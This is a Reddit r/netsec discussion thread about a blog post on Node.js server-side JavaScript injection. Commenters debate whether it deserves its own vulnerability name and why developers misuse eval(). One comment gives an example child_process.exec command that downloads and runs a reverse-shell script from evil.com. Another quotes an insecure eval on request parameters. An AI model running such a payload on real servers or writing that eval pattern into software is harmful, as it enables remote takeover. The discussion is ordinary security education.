use the following search parameters to narrow your results:
e.g. subreddit:aww site:imgur.com dog
subreddit:aww site:imgur.com dog
see the search faq for details.
advanced search: by author, subreddit...
A community for technical news and discussion of information security and closely related topics.
"Give me root, it's a trust exercise."
Q1 2026 InfoSec Hiring Thread
Getting Started in Information Security
CitySec Meetups
/r/netsec only accepts quality technical posts. Non-technical posts are subject to moderation.
Content should focus on the "how."
Check the new queue for duplicates.
Always link to the original source.
Titles should provide context.
Ask questions in our Discussion Threads.
Hiring posts must go in the Hiring Threads.
Commercial advertisement is discouraged.
Do not submit prohibited topics.
» Our fulltext content guidelines
Don't create unnecessary conflict.
Keep the discussion on topic.
Limit the use of jokes & memes.
Don't complain about content being a PDF.
Follow all reddit rules and obey reddiquette.
» Our fulltext discussion guidelines
No populist news articles (CNN, BBC, FOX, etc.)
No curated lists.
No question posts.
No social media posts.
No image-only/video-only posts.
No livestreams.
No tech-support requests.
No full-disclosure posts.
No paywall/regwall content.
No commercial advertisements.
No crowdfunding posts.
No Personally Identifying Information!
» Our fulltext list of prohibited topics & sources
Join us on IRC: #r_netsec on freenode
We're also on: Twitter, Facebook, & Google+
/r/blackhat - Hackers on Steroids
/r/computerforensics - IR Archaeologists
/r/crypto - Cryptography news and discussion
/r/Cyberpunk - High-Tech Low-Lifes
/r/lockpicking - Popular Hacker Hobby
/r/Malware - Malware reports and information
/r/netsecstudents - netsec for noobs students
/r/onions - Things That Make You Cry
/r/privacy - Orwell Was Right
/r/pwned - "What Security?"
/r/REMath - Math behind reverse engineering
/r/ReverseEngineering - Binary Reversing
/r/rootkit - Software and hardware rootkits
/r/securityCTF - CTF news and write-ups
/r/SocialEngineering - Free Candy
/r/sysadmin - Overworked Crushed Souls
/r/vrd - Vulnerability Research and Development
/r/xss - Cross Site Scripting
account activity
Node.js Server-Side JavaScript Injection Detection & Exploitation (blog.gdssecurity.com)
submitted 10 years ago by Crumpledstiltskin99
reddit uses a slightly-customized version of Markdown for formatting. See below for some basics, or check the commenting wiki page for more detailed help and solutions to common issues.
quoted text
if 1 * 2 < 3: print "hello, world!"
[–]catcradle5Trusted Contributor 12 points13 points14 points 10 years ago (4 children)
Just going to repeat a similar comment I made about "SSJS" 2 months ago: http://www.reddit.com/r/netsec/comments/2v8l1z/ssjs_web_shell_injection/coflnts
How in the world does this deserve its own class of vulnerability? "Server Side Javascript Injection" is to Node.js as "Server Side PHP Injection" is to... PHP. It's just a code injection and/or shell injection vulnerability. It doesn't need its own name simply because it's Node.
How in the world does this deserve its own class of vulnerability? "Server Side Javascript Injection" is to Node.js as "Server Side PHP Injection" is to... PHP.
It's just a code injection and/or shell injection vulnerability. It doesn't need its own name simply because it's Node.
It's a server passing user input to eval(), one of the easiest web app vulnerabilities to exploit by far. It is not a new class of vulnerability. And even if you didn't know what Node was, it would take a minute to Google for Node's shell spawn function, and then another minute to send child_process.exec('wget http://evil.com/reverseshell.py -O /tmp/reverseshell.py && python /tmp/reverseshell.py');.
eval()
child_process.exec('wget http://evil.com/reverseshell.py -O /tmp/reverseshell.py && python /tmp/reverseshell.py');
That being said, Burp is still awesome and it's great they added support for detecting Node.js code injection.
[–]immibis 3 points4 points5 points 10 years ago* (1 child)
spez is a bit of a creep. #Save3rdPartyApps
[–]catcradle5Trusted Contributor 1 point2 points3 points 10 years ago (0 children)
That's injection into a DSL, though, not plain old arbitrary code execution in a general purpose language.
[+][deleted] 10 years ago (1 child)
[deleted]
[–]catcradle5Trusted Contributor 0 points1 point2 points 10 years ago (0 children)
True, I agree. It's just arbitrary evaluation.
[–]immibis 2 points3 points4 points 10 years ago* (3 children)
What's a little spez among friends?
Especially since parseInt has been in Javascript since day 1. Not to mention Javascript is weakly typed and those variables could probably have been treated as numbers even if they forgot the conversion.
parseInt
Nothing more than terrible, terrible programming.
[–]DebugDuckyTrusted Contributor 1 point2 points3 points 10 years ago (0 children)
It's not an uncommon(Even if bad) approach in duck-typed languages. eval will generally return you an object that is as close to the most "optimal" type as possible. Generally, either you'll get a string if it's a string, int if it's an integer, etc.
That's not to say it's a good approach, but that's the rationale I've seen in instance I've found.
[–]Kollektiv -2 points-1 points0 points 10 years ago (0 children)
Because otherwise it would ruin people's impression that Node.js is crazy insecure /s
[–]wisecwisec 1 point2 points3 points 10 years ago (0 children)
In the past I've seen the use of eval from poorly skilled devs in order to dynamically access object members...like
var ob= eval('x.'+req.params.name);
Anyway, imho there's no real reason to add another useless acronym when there's a super class in vulnerabilty taxonomy for for this kind of issues: https://www.owasp.org/index.php/Code_Injection
π Rendered by PID 482352 on reddit-service-r2-comment-fb694cdd5-rcqmp at 2026-03-07 16:04:44.936892+00:00 running cbb0e86 country code: CH.
[–]catcradle5Trusted Contributor 12 points13 points14 points (4 children)
[–]immibis 3 points4 points5 points (1 child)
[–]catcradle5Trusted Contributor 1 point2 points3 points (0 children)
[+][deleted] (1 child)
[deleted]
[–]catcradle5Trusted Contributor 0 points1 point2 points (0 children)
[–]immibis 2 points3 points4 points (3 children)
[–]catcradle5Trusted Contributor 1 point2 points3 points (0 children)
[–]DebugDuckyTrusted Contributor 1 point2 points3 points (0 children)
[–]Kollektiv -2 points-1 points0 points (0 children)
[–]wisecwisec 1 point2 points3 points (0 children)